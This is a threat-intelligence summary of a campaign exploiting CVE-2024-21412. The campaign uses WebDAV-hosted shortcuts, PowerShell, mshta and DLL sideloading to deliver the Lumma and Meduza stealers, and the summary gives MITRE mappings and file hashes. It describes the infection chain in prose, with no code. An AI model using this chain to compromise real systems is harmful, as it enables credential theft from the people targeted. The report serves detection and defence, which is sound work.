CRIL reports an active campaign exploiting CVE-2024-21412 to bypass Microsoft Defender SmartScreen and deliver Lumma and Meduza Stealer payloads. The attack chain uses internet shortcuts hosted on WebDAV, multi-stage delivery with PowerShell, mshta, and DLL sideloading to evade defenses across Spain, the US, and Australia. #CVE-2024-21412 #SmartScreen #WebDAV #Lumma #MeduzaStealer #DarkGate #WaterHydra
Keypoints
- Active campaign exploits CVE-2024-21412 to bypass SmartScreen andDeploy payloads via internet shortcuts.
- Campaign targets Spain, the US, and Australia with lures tied to healthcare, transportation, and Medicare-related documents.
- Infection chain starts with a spam email linking to a WebDAV-hosted .url file, which then triggers a malicious LNK file.
- Multi-stage delivery uses forfiles.exe, PowerShell, mshta, and embedded JavaScript to download and execute final payloads.
- Final payloads include Lumma and Meduza Stealer, with DLL sideloading and IDATLoader to inject into explorer.exe.
- Victimology covers Spanish taxpayers, transportation firms, and Australian Medicare impersonations.
- MITRE-aligned techniques include phishing, PowerShell, mshta use, DLL sideloading, process injection, and C2 via application-layer protocols.
MITRE Techniques
- [T1566.002] Phishing – ‘Spear phishing emails with a malicious link’ – The infection starts with a spam email that appears to come from a trusted source. The attacker uses a malicious link to lure victims.
- [T1190] Exploits – ‘Exploit Public-Facing Application’ – Campaign leverages a vulnerability to bypass defenses and execute payloads.
- [T1059] Command and Scripting Interpreter – ‘PowerShell scripts are executed’ – PowerShell is used to run payloads during the infection chain.
- [T1218.005] System Binary Proxy Execution: Mshta – ‘Abuse mshta.exe to proxy execution of malicious hta file’ – mshta is used to run embedded or downloaded scripts.
- [T1036] Masquerading – ‘Double extension is used for masquerading’ – Files and extensions are manipulated to appear legitimate.
- [T1027] Obfuscated Files or Information – ‘Obfuscated PowerShell and JavaScript are used’ – Scripts/components are obfuscated to evade detection.
- [T1574.002] DLL Side-Loading – ‘TAs execute their own malicious payloads by side-loading DLLs’ – Malicious payloads are loaded via legitimate DLLs.
- [T1055] Process Injection – ‘Injects malicious content into Explorer.exe process’ – Payload is injected into a legitimate process for stealth.
- [T1071] Application Layer Protocol – ‘Stealer communicates with the C&C server’ – Final payload communicates with C2 over application-layer protocols.
Indicators of Compromise
- [SHA256] Malicious LNK files from this campaign – 58e2b766dec37cc5fcfb63bc16d69627cd87e7e46f0b9f48899889479f12611e, 268a0de2468726a106fd92563a846e764f2ba313e37b5fc0cf76171b0a363f6f, and 7 more hashes